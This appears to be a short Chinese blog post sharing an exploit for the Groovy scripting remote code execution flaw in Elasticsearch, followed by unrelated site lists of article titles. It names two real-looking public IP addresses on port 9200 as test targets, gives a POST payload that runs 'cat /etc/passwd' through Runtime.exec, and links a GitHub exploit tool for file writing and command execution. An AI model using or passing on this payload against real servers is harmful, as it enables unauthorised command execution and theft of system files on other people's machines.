测试url:http://190.196.67.252:9200/_search?pretty

http://191.234.18.14:9200///_search?pretty

POST提交

{“size”:1,”script_fields”: {“iswin”: {“script”:”java.lang.Math.class.forName(\”java.io.BufferedReader\”).getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\”java.io.InputStreamReader\”).getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”cat /etc/passwd\”).getInputStream())).readLines()”,”lang”: “groovy”}}}

下面直接上EXP

文件写入 管理 命令执行

https://github.com/Svti/ElasticSearchEXP/

最新文章

  1. Redis指南
  2. 一次部署HTTPS的相关事件引发的思考
  3. BZOJ 2330: [SCOI2011]糖果 [差分约束系统] 【学习笔记】
  4. CH Round #30 摆花[矩阵乘法]
  5. jquery实现手风琴效果
  6. Java集合框架的接口和类层次关系结构图
  7. C#学习笔记----.net操作进程
  8. Localstorage本地存储兼容函数
  9. 如果重新设计网络,有没有可能合并IP地址跟MAC地址?
  10. 简单几何(凸包+枚举) POJ 1873 The Fortified Forest
  11. DataSnap中连接池的应用
  12. web.xml常用元素
  13. jvm栈和堆详解
  14. 三层——vb.net版
  15. lib-flexble 使用遇到的bug及解决方案
  16. 暑假集训D11总结
  17. 第三方Charts绘制图表四种形式:饼状图,雷达图,柱状图,直线图
  18. 在Windows 10 + Python 3.6.5 中用 pip 安装最新版 TensorFlow v1.8 for GPU
  19. 一个不错的git资源站点
  20. .NET Core中使用Docker

热门文章

  1. 面试题32:从1到n整数中1出现的次数
  2. 面试题15:链表中倒数第K个节点
  3. Three.js基础探寻七——Lamber材质与Phong材质
  4. pycharm中在andconda环境中配置pyqt环境
  5. FileBuffer-ImageBuffer 模拟PE
  6. Bzoj3261/洛谷P4735 最大异或和(可持久化Trie)
  7. Linux_x86_Pwn溢出漏洞
  8. TCP三次握手,什么情况下client会回复reset
  9. Android开发AlertDialog解析
  10. HDU 4619 Warm up 2 最大独立集